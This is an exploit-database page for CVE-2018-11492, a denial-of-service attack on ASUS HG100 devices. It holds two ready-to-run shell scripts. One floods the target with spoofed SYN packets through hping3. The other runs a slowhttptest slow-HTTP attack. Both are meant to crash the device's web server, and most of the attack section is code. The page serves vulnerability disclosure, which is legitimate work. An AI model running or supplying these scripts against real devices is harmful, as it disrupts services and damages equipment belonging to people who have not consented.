Asus hg100 denial of service Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2019-04-17 | Type : dos | Platform : hardware
This exploit / vulnerability Asus hg100 denial of service is for educational purposes only and if it is used you will do on your own risk!

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# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS
# Date: 2019-04-14 # Exploit Author: YinT Wang;
# Vendor Homepage:
# Version: Hardware version: HG100 、Firmware version: 1.05.12
# Tested on: Currnet 1.05.12
# CVE : CVE-2018-11492

1. Description
The attack at same Local-Network-area could crash the device via the Hping3 or Slowhttptest(which is not include in the CVE-2018-11492).

2.Proof of Concept
Just Execute the following script in kali which could crash the devices

1. IPv4 packet and in result of devices crash.which written in linux script.

#needed to co-operate with hping3 tool
#with the time period at least 220s which could cause web server of HG100 devices crash
read -p "enter the ip of HG100 here " url
hping3 -V -c 10000 -S -w 64 --flood --rand-source $url
sleep 220
echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s"
exit 0

2.Slowhttp test and caused the devices crash.which written in linux script.

#needed to co-operate with slowhttptest tool
#with the time period 600s which could cause web server of HG100 devices crash
read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url
slowhttptest -H -R -c 10000 -l 600 -u $url
sleep 600
echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s"
exit 0